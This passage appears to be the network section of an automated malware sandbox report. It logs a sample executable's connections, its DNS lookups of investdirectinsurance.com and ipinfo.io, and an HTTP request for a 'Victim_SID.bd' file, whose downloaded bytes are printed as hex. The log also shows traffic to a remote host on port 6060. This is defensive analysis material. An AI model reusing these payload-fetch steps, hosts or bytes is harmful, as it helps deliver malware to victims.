                    Jul 27, 2024 11:37:07.318583965 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.318921089 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.318998098 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.320246935 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.320337057 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.322269917 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.322341919 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.323681116 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.323824883 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.324424982 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.324515104 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.325239897 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.325325012 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.326138973 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.326222897 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.326853037 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.326946974 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.327627897 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.327702999 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.327842951 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.327860117 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.327927113 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.330780983 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.330852985 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.330878973 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.330890894 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.330919981 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.330939054 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.331773043 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.331862926 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.331876040 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.331927061 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.333684921 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.333818913 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.333832026 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.333924055 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.334549904 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.334650040 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.335454941 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.335550070 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.337172031 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.337213039 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.337249041 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.337255955 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.337270975 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.337296963 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.338756084 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.338823080 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.338829041 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.338871956 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.404294014 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.404314995 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.404553890 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.404591084 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.404648066 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.405031919 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.405105114 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.406919003 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.406975985 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.406997919 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.407013893 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.407048941 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.407073975 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.409737110 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.409756899 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.409857988 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.409872055 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.409929037 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.411490917 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.411506891 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.411590099 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.411606073 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.411632061 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.411664009 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.413233995 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.413275003 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.413320065 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.413333893 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.413360119 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.413383961 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.415052891 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.415071011 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.415149927 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.415163994 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.415220976 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.417572975 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.417589903 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.417622089 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.417670965 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.417685986 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.417715073 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.417737007 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.418494940 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.418577909 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.418590069 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.418642998 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.492659092 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.492750883 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.492786884 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.492808104 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.492846012 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.492865086 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.494060040 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.494144917 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.499680042 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.499761105 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.499773979 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.499825954 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.504782915 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.504825115 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.504842997 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.504851103 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.504862070 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.504888058 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.505983114 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.506035089 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.506066084 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.506077051 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.506089926 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.506122112 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.506386042 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.506448984 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.507275105 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.507330894 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.508127928 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.508193016 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.509052992 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.509115934 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.509854078 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.509913921 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.510859966 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.510902882 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.510926008 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.510931969 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.510946035 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.510965109 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.510972023 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.511017084 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.511169910 CEST49722443192.168.2.5172.67.189.102
                    Jul 27, 2024 11:37:07.511184931 CEST44349722172.67.189.102192.168.2.5
                    Jul 27, 2024 11:37:07.932435989 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:07.932492018 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:07.932560921 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:07.940504074 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:07.940534115 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.451232910 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.451323032 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:08.453528881 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:08.453541040 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.453783035 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.508312941 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:08.560265064 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:08.600512981 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.698191881 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.698404074 CEST4434972334.117.59.81192.168.2.5
                    Jul 27, 2024 11:37:08.698493004 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:08.706599951 CEST49723443192.168.2.534.117.59.81
                    Jul 27, 2024 11:37:09.314834118 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:09.319777012 CEST60604972446.23.108.235192.168.2.5
                    Jul 27, 2024 11:37:09.319844961 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:09.327317953 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:09.332729101 CEST60604972446.23.108.235192.168.2.5
                    Jul 27, 2024 11:37:09.332782030 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:09.338110924 CEST60604972446.23.108.235192.168.2.5
                    Jul 27, 2024 11:37:11.025202036 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:11.026345968 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:11.054380894 CEST60604972446.23.108.235192.168.2.5
                    Jul 27, 2024 11:37:11.092401028 CEST60604972446.23.108.235192.168.2.5
                    Jul 27, 2024 11:37:12.633332014 CEST49674443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:12.633430004 CEST49675443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:12.821029902 CEST49673443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:14.465827942 CEST4434970823.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:14.466078997 CEST49708443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:24.434997082 CEST49708443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:24.435070992 CEST49708443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:24.440051079 CEST4434970823.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:24.440092087 CEST4434970823.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:24.443499088 CEST49730443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:24.443531990 CEST4434973023.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:24.444025993 CEST49730443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:24.445683956 CEST49730443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:24.445698977 CEST4434973023.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:25.058335066 CEST4434973023.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:25.058407068 CEST49730443192.168.2.523.1.237.91
                    Jul 27, 2024 11:37:30.699996948 CEST60604972446.23.108.235192.168.2.5
                    Jul 27, 2024 11:37:30.700587988 CEST497246060192.168.2.546.23.108.235
                    Jul 27, 2024 11:37:44.214016914 CEST4434973023.1.237.91192.168.2.5
                    Jul 27, 2024 11:37:44.214287996 CEST49730443192.168.2.523.1.237.91
                    Jul 27, 2024 11:38:42.743381977 CEST4970780192.168.2.5199.232.214.172
                    Jul 27, 2024 11:38:42.983455896 CEST8049707199.232.214.172192.168.2.5
                    Jul 27, 2024 11:38:42.983534098 CEST4970780192.168.2.5199.232.214.172
                    TimestampSource PortDest PortSource IPDest IP
                    Jul 27, 2024 11:37:04.642872095 CEST6167053192.168.2.51.1.1.1
                    Jul 27, 2024 11:37:04.678554058 CEST53616701.1.1.1192.168.2.5
                    Jul 27, 2024 11:37:07.915385008 CEST6521953192.168.2.51.1.1.1
                    Jul 27, 2024 11:37:07.926549911 CEST53652191.1.1.1192.168.2.5
                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                    Jul 27, 2024 11:37:04.642872095 CEST192.168.2.51.1.1.10xc56aStandard query (0)investdirectinsurance.comA (IP address)IN (0x0001)false
                    Jul 27, 2024 11:37:07.915385008 CEST192.168.2.51.1.1.10x6a1aStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                    Jul 27, 2024 11:37:02.293458939 CEST1.1.1.1192.168.2.50xc05eNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    Jul 27, 2024 11:37:02.293458939 CEST1.1.1.1192.168.2.50xc05eNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    Jul 27, 2024 11:37:04.678554058 CEST1.1.1.1192.168.2.50xc56aNo error (0)investdirectinsurance.com172.67.189.102A (IP address)IN (0x0001)false
                    Jul 27, 2024 11:37:04.678554058 CEST1.1.1.1192.168.2.50xc56aNo error (0)investdirectinsurance.com104.21.65.79A (IP address)IN (0x0001)false
                    Jul 27, 2024 11:37:07.926549911 CEST1.1.1.1192.168.2.50x6a1aNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                    Jul 27, 2024 11:37:23.714792967 CEST1.1.1.1192.168.2.50x921bNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    Jul 27, 2024 11:37:23.714792967 CEST1.1.1.1192.168.2.50x921bNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    Jul 27, 2024 11:37:36.791250944 CEST1.1.1.1192.168.2.50xe628No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                    Jul 27, 2024 11:37:36.791250944 CEST1.1.1.1192.168.2.50xe628No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                    • investdirectinsurance.com
                    • ipinfo.io
                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    0192.168.2.549721172.67.189.1024437060C:\Users\user\Desktop\d34e1p5zD2.exe
                    TimestampBytes transferredDirectionData
                    2024-07-27 09:37:05 UTC136OUTGET /assuence/litesolidCha/Victim_SID.bd HTTP/1.1
                    User-Agent: Mozilla/5.0
                    Host: investdirectinsurance.com
                    Cache-Control: no-cache
                    2024-07-27 09:37:05 UTC677INHTTP/1.1 200 OK
                    Date: Sat, 27 Jul 2024 09:37:05 GMT
                    Content-Type: application/octet-stream
                    Content-Length: 47616
                    Connection: close
                    etag: "ba00-66a2ddbd-31025;;;"
                    last-modified: Thu, 25 Jul 2024 23:20:29 GMT
                    accept-ranges: bytes
                    CF-Cache-Status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d%2FuCwCkkbNPdPwRGJK7oX8T3D6agj5HNb5PIKNTwZlkU5R2Yo2mtuZQwP4xid5JaiE9nK8ya3CDwchacfLo8yNJcmGNSHVTUX2zUF2ybJiqrG9apelSBD1Evm1XC9WW04Jrxbj0oVzzFXMO%2B"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 8a9ba6187f64199d-EWR
                    alt-svc: h3=":443"; ma=86400
                    2024-07-27 09:37:05 UTC692INData Raw: a6 82 35 e1 29 9d ea cd a8 54 4c 6c 66 73 36 c5 4c 59 de 4c 7e 21 4c ea 2f ee b9 97 4c 2b fc 4c 6c c6 4c ae 23 35 71 39 13 c6 99 4c ea 83 4c 59 ac 9e b9 a2 4c 6c 2d 4c ae b3 4c 59 69 4c 7e 75 4c ea 6b 4c 59 20 4c 2b 58 4f 6e b1 4c ae cb 4c 59 d5 4c 7e 0f 4c ea d7 4c 59 98 4c 2b f6 4c 6c c9 4c ae 24 4c 59 3f 4c 7e 93 4c ea 3c 4c 59 74 4c 2b 8d 4c 6c 27 4c ae 9c 4c 59 63 4c 7e 7b 4c ea 60 4c 59 0e 4c 2b 51 4c 6c 9f 4c ae c0 4c 59 db 4c 7e 04 4c ea d8 4c 59 92 4c 2b f9 4c 6c c3 4c ae 2a 4c 59 34 4c 7e ac 4c ea 36 4c 59 7a 4c 2b 87 4c 6c 29 4d af 96 4c 59 4c 4c 7e 70 4c ea 39 1a fe bf 85 52 a8 cb db 22 3b 78 7e 4c 59 a2 bc 8e b2 31 96 bf e2 06 d7 e3 46 60 1f ff c4 66 a2 52 be 2b e1 04 10 d9 61 84 19 2c 79 63 1c 39 32 77 73 b9 f0 f7 db 0f 1a c5 cf bc 0b aa bc
                    Data Ascii: 5)TLlfs6LYL~!L/L+LlL#5q9LLYLl-LLYiL~uLkLY L+XOnLLYL~LLYL+LlL$LY?L~L<LYtL+Ll'LLYcL~{L`LYL+QLlLLYL~LLYL+LlL*LY4L~L6LYzL+Ll)MLYLL~pL9R";x~LY1F`fR+a,yc92ws
                    2024-07-27 09:37:05 UTC1369INData Raw: 7e 60 4c ea 9e 4c 59 d6 4c 2b 3c 8e ef 84 4c ae 6e 4c 59 42 8f fc d8 4c ea c2 4c 59 3d 4c 2b e3 4c 6c 6c 4c ae f2 4c 59 ea 8f fc 36 4c ea 29 4c 59 61 4c 2b 18 4c 6c f0 4c ae 89 4c 59 96 4c 7e 4e 4c ea 95 4c 59 d9 4c 2b b4 4c 6c 8a 4c ae 69 b1 55 7e 4c 7e d2 4c ea 39 e8 1f 37 4c 2b cc 4c 6c 66 4c ae dd 4c 59 61 0e 3e 39 4c ea 23 4c 59 ae bf 8a 8a b2 b4 de 4c ae 83 4c 59 99 4c 7e 45 4c ea 9b 4c 59 d3 4c 2b ba 4c 6c 81 4c ae 6b 4c 59 75 4c 7e ed 4c ea 77 4c 59 38 4c 2b c6 4c 6c 69 4c ae d7 4c 59 0f 4c 7e 33 4c ea 0c 4c 59 45 4d 2a 2d 4c 6c d5 4c ae cc bc 29 93 4c 7e 4b 4c ea 90 4c 59 ec 4c 2b b1 4c 6c 3f 4c ae 60 4c 59 7b 4c 7e e7 4c ea 78 4c 59 32 4c 2b c9 4c 6c 63 4c ae d8 4c 59 04 4c 7e 1c 4c ea 06 4c 59 4a 4c 2b 27 4c 6c db 4c ae 36 4c 59 ac 4c 7e 40 4c
                    Data Ascii: ~`LLYL+<LnLYBLLY=L+LllLLY6L)LYaL+LlLLYL~NLLYL+LlLiU~L~L97L+LlfLLYa>9L#LYLLYL~ELLYL+LlLkLYuL~LwLY8L+LliLLYL~3LLYEM*-LlL)L~KLLYL+Ll?L`LY{L~LxLY2L+LlcLLYL~LLYJL+'LlL6LYL~@L
                    2024-07-27 09:37:05 UTC1369INData Raw: 5b c4 c2 3f 4c 2b e0 4c 6c 29 0b d8 54 68 dc 35 e0 66 24 1e fb 37 47 41 63 4c 2b 1a 4c 6c 35 e9 2a 14 c4 c2 59 57 42 71 26 72 38 10 e6 10 91 e5 a7 9c 7d b9 7c 1e 67 4c 59 7d 4c 7e 17 5a 4e 50 c4 c2 40 1a cd 5f 9c 7d e9 c6 12 df 4c 59 23 4c 7e bf 5a 4e f8 c4 c2 d0 d7 c1 41 dd 3c 70 a2 67 11 5e c8 9b 4c 7e 47 4c ea 68 ee b9 5e 63 85 c5 51 84 12 9d bf ec 49 ad 77 4c 7e ef 4c ea 02 49 ad 3d 9a 0d 71 fb 78 53 66 a2 ce c4 c2 6c 6e 1e fc a1 06 6e bc 29 67 3d 0a 53 e3 24 c6 9d bf d2 07 01 90 4c 7e 48 4c ea 56 49 ad 83 65 72 a8 31 77 3c 4c ae 62 4c 59 1e c9 8a 61 ba 2c 41 10 e6 49 d7 c1 5a 9c 7d d8 d3 06 da 4c 59 06 4c 7e ba 5a 4e dd c4 c2 d9 5d 79 12 2b 6b c6 b0 b4 59 42 35 7e df ae 8b f5 20 30 a7 e0 e5 4c 2b 9c 4c 6c 96 7c 1e a7 10 e6 21 df ae 3f 09 9c e1 9e 49
                    Data Ascii: [?L+Ll)Th5f$7GAcL+Ll5*YWBq&r8}|gLY}L~ZNP@_}LY#L~ZNA<pg^L~GLh^cQIwL~LI=qxSflnn)g=S$L~HLVIer1w<LbLYa,AIZ}LYL~ZN]y+kYB5~ 0L+Ll|!?I
                    2024-07-27 09:37:05 UTC1369INData Raw: 6f d9 a7 42 97 c8 92 47 88 4c 59 97 4c 7e eb 5a 4e d0 eb 1d d5 b7 22 b5 4c 6c 4f e9 2a 61 a9 5c 7f 4c 7e d3 4c ea 52 c4 c2 b7 8e e8 f1 b2 b4 67 4c ae b5 92 26 20 4c 7e 38 4c ea 22 4c 59 72 e4 f1 13 4c 6c df 4c ae 0d 10 e6 98 4c 7e 50 6b 7e e5 74 32 70 bd 88 81 67 e2 a4 59 8a 07 74 32 6b 87 d1 57 a0 07 13 99 3e cd 6b bd 84 0e 2c 5c 59 8a af 74 32 fb 78 e9 ff a0 07 43 74 32 87 cc a9 78 5a 08 96 0e ec a9 3a 4d e9 50 84 b4 04 d1 1e 11 e7 a0 85 52 62 5f bf ea 1b c8 23 0c 19 1d c9 8a ef 76 e3 79 4c 59 b7 1a cd 7d 0a 59 62 4c ae d9 4c 59 05 4c 7e 23 a6 f0 86 8c 98 7b 6f d9 26 4c 6c e3 b7 b3 37 4c 59 ad 4c 7e 41 4c ea 43 47 41 e7 4c 2b 9e 4c 6c 0b a5 60 4f 4c 59 c5 9b 5a f5 26 72 1a 74 32 6d ac 58 d2 5d bc a6 a4 61 f7 3a 4d 17 e0 66 6c 47 90 41 f3 14 50 df f9 d0
                    Data Ascii: oBGLYL~ZN"LlO*a\L~LRgL& L~8L"LYrLlLL~Pk~t2pgYt2kW>k,\Yt2xCt2xZ:MPRb_#vyLY}YbLLYL~#{o&Ll7LYL~ALCGAL+Ll`OLYZ&rt2mX]a:MflGAP
                    2024-07-27 09:37:05 UTC1369INData Raw: 6c 58 dc fc 66 4c 59 7c 4c 7e 5e a1 06 7e 4c 59 83 9a 0d 88 4b 18 c4 7c 1e 15 30 95 f1 9e ef ee ca 1e 21 4c 59 4d 4c 2b 94 a9 a8 b2 20 e4 14 da 7c d9 0d 3c 46 4c ea 99 4c 59 23 6f d9 4c 1a 48 9a 73 36 c9 ee b9 0d 41 96 79 eb fc 75 4c 59 94 47 d2 df b0 b6 6a 4c ae d5 4c 59 a9 2a ba 37 da cc f9 db 7d 6b a3 07 5e 2c 0c 85 dc fc 8e fd 68 d9 30 36 98 1e fb df 91 25 ef 4c 2b b2 4c 6c 49 e9 2a f8 84 82 67 63 e4 e5 4c ea 7b 4c 59 54 38 6d bf c8 d9 44 48 9b db 4c 59 07 4c 7e 20 a6 f0 85 8c 98 78 6f d9 25 4c 6c e0 b7 b3 34 4c 59 af 4c 7e 43 4c ea 40 47 41 e4 4c 2b 9d 4c 6c 08 a5 60 4c 4c 59 c7 9b 5a f7 26 72 19 74 32 2e ec 1b d1 5d bc a5 a4 61 f4 3a 4d 14 e0 66 6e 47 90 02 b1 55 52 df f9 d2 67 e2 86 fb fb ce 78 0d e4 0e 3e 68 6b 7e be 47 41 87 85 52 b3 29 68 a8 5c
                    Data Ascii: lXfLY|L~^~LYK|0!LYML+ |<FLLY#oLHs6AyuLYGjLLY*7}k^,h06%L+LlI*gcL{LYT8mDHLYL~ xo%Ll4LYL~CL@GAL+Ll`LLYZ&rt2.]a:MfnGURgx>hk~GAR)h\
                    2024-07-27 09:37:05 UTC1369INData Raw: 0f 9e 49 ec 75 f1 57 47 90 e3 ce da 18 6b bd 52 0e 2c 09 59 8a 9b 47 41 e7 50 84 6f 97 c0 4b 9e 49 5d 62 84 d5 c2 17 93 5e 3c 1c 78 0d 37 0e 3e ab 7b ae 7e 54 50 38 4c 2b 21 a9 a8 4c 48 9b d7 4c 59 0f 4c 7e 33 4c ea f0 c4 c2 c5 8e e8 99 a9 a8 d5 4c ae 15 00 74 93 4c 7e 4b 4c ea 90 4c 59 26 91 e5 b1 4c 6c 3f 4c ae ae 10 e6 7b 4c 7e d0 da cc 1e eb 1d 27 0a 1e 88 0d 2f 63 4c ae d8 4c 59 34 3d 4e 88 6b 7e 1e 47 41 dd 4b 5e 37 5d bc ca 9d bf 15 2f 7a ac 4c 7e 40 4c ea ea eb 1d 05 6f d9 8e 9c 7d be e0 24 4e 4c 59 70 4c 7e 8e 7b ae 63 5e c8 bf fe ca c3 4c 6c 4c 4c ae a5 eb 1d 3d 4a 48 01 eb fc 09 4c 59 7b 47 d2 37 b0 b6 d0 4c ae 39 4c 59 52 2a ba 01 36 a2 ac 54 50 e9 4c 2b 7c 51 84 1f 48 9b 91 bb cd 5e 4c 7e d6 6b 7e 49 bb cd 17 4c 2b e8 1a 48 fd 02 d7 dc fd 68
